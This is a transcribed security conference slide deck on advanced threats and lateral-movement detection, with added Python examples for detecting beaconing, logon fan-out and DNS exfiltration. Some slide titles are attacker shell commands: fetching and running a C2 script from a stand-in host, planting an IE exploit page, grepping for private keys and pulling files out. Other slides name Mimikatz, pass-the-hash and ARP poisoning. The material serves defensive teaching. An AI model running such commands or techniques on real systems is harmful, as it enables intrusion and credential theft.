advanced threats and lateral movement detection

Upload: greg-foss

Post on 26-Jan-2017

Page 1: Advanced Threats and Lateral Movement Detection

Advanced Threats & Lateral Movement Detection
Greg Foss, OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Sr. Security Research Engineer, LogRhythm Labs

Page 2

# whoami

• Greg Foss
• Sr. Security Researcher
• LogRhythm Labs – Threat Intel Team
• Former DOE Penetration Tester
• Focus => Honeypots, Incident Response, and Red Team
• OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…

Page 3

# ls -lha

1. IT Security Threats
2. Event Correlation
3. Detection
4. DEMO!

Page 4

Page 5

# man [Advanced Threats]

• Advanced Persistent Threats
• Organized Cyber Crime
• Hacktivists
• ‘Cyber Terrorists’
• Etc…

• Able to develop and utilize sophisticated techniques in pursuit of their target objective, from reconnaissance to data exfiltration.
• Will leverage the full spectrum of attack vectors – social, technical, physical, etc.
• Highly organized, highly motivated, highly resourced.
• Willing to invest significant time and resources to compromise.

Page 6

It’s when, not if…

• Mission Oriented
• Persistent and Driven
• Patient and Methodical
• Focus on exponential ROI
• Emphasis on high IP value targets
• They will get in…

Image: http://postfiles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg

Page 7

Identify a ‘Hacker’

Page 8

Ok, for real…

• *Simple… Correlate on odd network / host activity
• Use the data at hand to actively detect anomalies
• Understand how your organization will respond to a breach / outage / squirrel affecting any of the three InfoSec pillars
  • Confidentiality
  • Integrity
  • Availability

Page 9

Advanced Threat Tactics and Evasion

• Threat actors of all types move slowly and quietly over time, limiting exposure and potential for discovery.
• Trending on enterprise data over time helps to build baselines that can be used to actively identify anomalies.

Page 10

IT Security Threats

Page 11

# last && echo ‘How are they getting in??’

• Phishing
  • 91% of ‘advanced’ attacks began with a phishing email or similar social engineering tactics.
  • http://www.infosecurity-magazine.com/view/29562/91-of-apt-attacks-start-with-a-spearphishing-email/
• 2014 Metrics
  • Average cost per breach => $3.5 million
  • 15% higher than the previous year
  • http://www.ponemon.org/blog/ponemon-institute-releases-2014-cost-of-data-breach-global-analysis

Page 12

(same content as page 11)

Page 13

# history | more

• It only takes one…

Page 14

# ./searchsploit ‘client side’ && echo ‘new exploits daily!’

Page 15

# cat [cve-2014-6332] >> /var/www/pwn-IE.html

Page 16

Event Correlation & Detection

Page 17

Defense in Depth

Page 18

Spear Phishing

Page 19

Phishing Attack Log Traces

Page 20

$ vim next.sh

• Maintain Access…

Image: http://www.netresec.com/images/back_door_open_300x200.png

Page 21

$ ./next.sh

• Then?
• *Nothing…
• For a long time… *not really*
• They have attained a foothold and are now your newest employees…

Page 22

$ su - root

Page 23

# wget http://bad.stuff.net/c2.py . && ./c2.py

• Once infected, the beachhead will beacon periodically

Page 24

Behavioral Analytics

• Beaconing Activity – Usually initiated over port 443 or an encrypted tunnel over port 80.
  • Can be detected with a Firewall or Web Proxy
  • Capability to decrypt SSL traffic is a huge plus
• Behavioral analytics can be utilized to differentiate normal browsing activity from possible evidence of an infected host.
  • Using a SIEM, track the unique websites usually visited, and the overall volume of normal web activity, on a per user and a per host basis.
  • Watch for significant changes over an extended period of time.
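As an added example (not code from the deck or from LogRhythm), the two checks this slide describes, run over a constructed proxy log: flagging (source, destination) pairs that are contacted at near-constant intervals, and counting the distinct sites each host visits as the per-host baseline to trend. The log format, hostnames and thresholds are assumptions.

```python
"""Beacon detection over web-proxy logs (added example, not from the deck).
Assumed constructed log format: '<epoch> <src_ip> <dest_host> <bytes>'."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 browses normally; 10.0.0.9 calls one host every 300 s.
SAMPLE_LOG = "\n".join(
    [f"{1700000000 + t} 10.0.0.5 {site} {n}"
     for t, site, n in [(3, "news.example", 5120), (41, "mail.example", 2200),
                        (95, "cdn.example", 80000), (130, "news.example", 4100),
                        (400, "shop.example", 9000)]]
    + [f"{1700000000 + 300 * i} 10.0.0.9 update.c2.example 512" for i in range(8)]
)

def parse(log):
    """Return {(src, dest): [timestamps]} from the constructed format."""
    seen = defaultdict(list)
    for line in log.splitlines():
        ts, src, dest, _ = line.split()
        seen[(src, dest)].append(int(ts))
    return seen

def beacon_candidates(log, min_hits=6, max_jitter=0.1):
    """Flag (src, dest) pairs contacted at near-constant intervals.
    jitter = stdev / mean of the gaps between contacts; real beacons sit near 0,
    human browsing of the same site does not."""
    flagged = []
    for (src, dest), times in parse(log).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else 1.0
        if jitter <= max_jitter:
            flagged.append((src, dest, round(avg), round(jitter, 3)))
    return flagged

def unique_sites_per_host(log):
    """Distinct destinations per host: the per-host baseline the slide says to trend."""
    hosts = defaultdict(set)
    for src, dest in parse(log):
        hosts[src].add(dest)
    return {h: len(s) for h, s in hosts.items()}

if __name__ == "__main__":
    print(beacon_candidates(SAMPLE_LOG))      # [('10.0.0.9', 'update.c2.example', 300, 0.0)]
    print(unique_sites_per_host(SAMPLE_LOG))  # {'10.0.0.5': 4, '10.0.0.9': 1}
```

Real beacons add jitter on purpose, so in practice the threshold is tuned against the baseline rather than set to zero.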

Page 25

Reconnaissance

• Ping sweeps, service discovery, etc. – NO
• Why make unnecessary noise?
• Instead => access network shares, web apps, and services
• Passively gather information using available resources…

Image: http://macheads101.com/pages/pics/download_pics/mac/portscan.png

Page 26

Lateral Movement

• Dump Local System Hashes
  • Maybe crack them, maybe it’s not even necessary…
• Pass the Hash (PtH)
• Dump plain text passwords
  • Mimikatz -- FTW!
• Act as an internal employee -- use legitimate means to access resources.

Page 27

Uncovering Internal Reconnaissance and Pivoting

• Security Operations Goal => Reduce MTTD and MTTR
  • MTTD – Mean Time to Detect
  • MTTR – Mean Time to Respond
• Set Traps => Honeypot / Honey Token access
• Overt Clues => Modification of user / file / group permissions and pivoting evidence
• Subtle Clues => VPN access from disparate geographical locations
• Missed Opportunities => Once inside, they are now an ‘employee’…

Page 28

Lateral Movement Log Traces

• Microsoft’s granular Event Identification schema (EVID), in conjunction with environment information, provides analysts with plenty of information to track attackers once they have breached the perimeter.
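As an added example that is not from the deck, one correlation over Windows Security events that ties pages 26 to 28 together: a single account and source IP opening NTLM network logons (event 4624, logon type 3) to many hosts in a short window, with special privileges (event 4672) assigned on each. The deck names no specific event IDs; the events below are constructed, the field names follow the 4624/4672 schema, and the window and host-count thresholds are assumptions.

```python
"""Lateral-movement fan-out over Windows Security events (added example, not from
the deck). Events are constructed dicts using the real 4624/4672 field names;
the window and host-count thresholds are assumptions to tune per environment."""
from collections import defaultdict

def ev(ts, host, eid, user, ip, logon_type=None, pkg=None):
    """Build one event; `ts` is seconds relative to the start of the sample."""
    return {"time": ts, "Computer": host, "EventID": eid, "TargetUserName": user,
            "IpAddress": ip, "LogonType": logon_type, "AuthenticationPackageName": pkg}

# Constructed sample: jsmith logs on interactively to her own workstation, while
# svc_backup from 10.0.0.9 opens NTLM network logons (type 3) to five hosts in
# four minutes and is granted special privileges (4672) on each one.
SAMPLE_EVENTS = [ev(0, "WS01", 4624, "jsmith", "127.0.0.1", 2, "Negotiate")] + [
    e for i, h in enumerate(["FS01", "FS02", "HR-DB", "WS07", "DC01"])
    for e in (ev(60 * i, h, 4624, "svc_backup", "10.0.0.9", 3, "NTLM"),
              ev(60 * i + 1, h, 4672, "svc_backup", "10.0.0.9"))
]

def network_logons(events):
    """Successful network logons (4624, LogonType 3) grouped by (user, source IP)."""
    by_actor = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] == 3:
            by_actor[(e["TargetUserName"], e["IpAddress"])].append(e)
    return by_actor

def fanout_alerts(events, window=600, min_hosts=4):
    """Alert when one (user, IP) reaches >= min_hosts distinct hosts within `window`
    seconds; record NTLM use (classic pass-the-hash rides on NTLM) and where 4672 fired."""
    admin = {(e["TargetUserName"], e["Computer"]) for e in events if e["EventID"] == 4672}
    alerts = []
    for (user, ip), logons in network_logons(events).items():
        logons.sort(key=lambda e: e["time"])
        for i, first in enumerate(logons):
            hosts = {e["Computer"] for e in logons[i:] if e["time"] - first["time"] <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"user": user, "src": ip, "hosts": sorted(hosts),
                               "ntlm": any(e["AuthenticationPackageName"] == "NTLM" for e in logons),
                               "admin_on": sorted(h for h in hosts if (user, h) in admin)})
                break  # one alert per actor is enough for the analyst
    return alerts

if __name__ == "__main__":
    for a in fanout_alerts(SAMPLE_EVENTS):
        print(a)
```

Service accounts that legitimately touch many hosts will trip this rule, so the baseline of which accounts normally fan out is what turns it from noise into a detection.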

Page 29

Passive Data Extraction

• Well Poisoning via UNC Paths
• SMB Replay
• Help Desk Tickets
• Responder – By Spider Labs
• Keylogging

Page 30

Passive Traffic Analysis

• Analyze / capture anything that comes across the wire.
• ARP poison hosts of interest, take over switches/routers, etc.

Image: https://i.chzbgr.com/maxW500/5579525376/h7D009AE4/

Page 31

# grep -rhi ‘private key’ /* && echo “Identify Key Resources”

• Keys / Certificates / Passwords
• File Shares and Databases
• Intellectual Property
• Domain Controllers / Exchange / etc.
• Business Leaders – CXO, Director, VP, etc.
• Administrative Assistants

Image: http://www.mobilemarketingwatch.com/wordpress/wp-content/uploads/2011/07/Top-Secret-Tip-To-Pick-SMS-Keyword.jpeg

Page 32

# wget http://target/files.tgz && echo “Data Exfiltration”

• Target data identified, gathered, and moved out of the environment.
• Data is normally leaked in a ‘hidden’ or modified format; rarely is the actual document extracted.
• Emails and Employee PII
• Intellectual Property
• Trade Secrets

Image: http://www.csee.umbc.edu/wp-content/uploads/2013/04/ex.jpg

Page 33

Data Exfiltration is Often Not ‘Advanced’

Page 34

Catching Data Exfiltration

• Granular restrictions on sensitive files and directories to specific groups or individuals; alert on any abnormal file access / read / write / etc.
• DNS exfiltration, or sometimes even ICMP tunneling in high security environments
• Non-SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
• Abnormal web server activity, newly created files, etc.
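As an added example (not from the deck), a heuristic for the DNS exfiltration bullet run over a constructed resolver log: a host issuing many unique, long, random-looking subdomains under one domain, which is how encoded data leaves over DNS. The log format and thresholds are assumptions, and a production version would use a public-suffix list to find the registered domain.

```python
"""DNS-exfiltration heuristics over a resolver log (added example, not from the deck).
Assumed constructed log format: '<epoch> <src_ip> <qname>'; thresholds are assumptions."""
from collections import defaultdict
from hashlib import sha256
from math import log2
from statistics import mean

def base_domain(qname):
    """Last two labels; production code would consult a public-suffix list."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def entropy(s):
    """Shannon entropy of a string in bits per character."""
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * log2(p) for p in probs) if s else 0.0

# Constructed sample: 10.0.0.5 resolves a few ordinary names repeatedly; 10.0.0.9
# sends twelve never-repeating 40-char hex labels under one domain, as a tunnel would.
SAMPLE_DNS = "\n".join(
    [f"{1700000000 + 10 * i} 10.0.0.5 {n}" for i, n in enumerate(
        ["www.example", "mail.example", "cdn.example", "www.example", "shop.example"])]
    + [f"{1700000000 + 2 * i} 10.0.0.9 {sha256(str(i).encode()).hexdigest()[:40]}.t.c2.example"
       for i in range(12)]
)

def dns_exfil_candidates(log, min_unique=10, min_label_len=30, min_entropy=3.0):
    """Flag (src, domain) pairs whose leftmost labels are numerous, long and random-looking.
    Ordinary names repeat and are short; encoded payloads are unique and dense."""
    seen = defaultdict(set)
    for line in log.splitlines():
        _, src, qname = line.split()
        seen[(src, base_domain(qname))].add(qname)
    flagged = []
    for (src, dom), names in seen.items():
        labels = [n.split(".")[0] for n in names]
        avg_len = mean(len(l) for l in labels)
        avg_ent = mean(entropy(l) for l in labels)
        if len(names) >= min_unique and avg_len >= min_label_len and avg_ent >= min_entropy:
            flagged.append((src, dom, len(names), round(avg_len, 1)))
    return flagged

if __name__ == "__main__":
    print(dns_exfil_candidates(SAMPLE_DNS))  # [('10.0.0.9', 'c2.example', 12, 40.0)]
```

CDNs and some security products also generate long unique labels, so allow-listing known domains before alerting keeps the rule usable.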

Page 35

It all comes down to Event Correlation

Page 36

DEMO

Page 37

Closing Thoughts…

• Don’t be hard on the outside, soft and chewy on the inside…
• Implement Layer 3 (network) Segmentation and Least User Privilege
• Understand your environment and log data so that you can accurately correlate physical and cyber events
• Implement URL filtering, stateful packet inspection, and binary analysis
• Actively alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
• The earlier you can detect attackers the better…

Page 38

Thank You!

QUESTIONS?

Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
Senior Security Research Engineer
Greg.Foss[at]logrhythm.com
@heinzarelli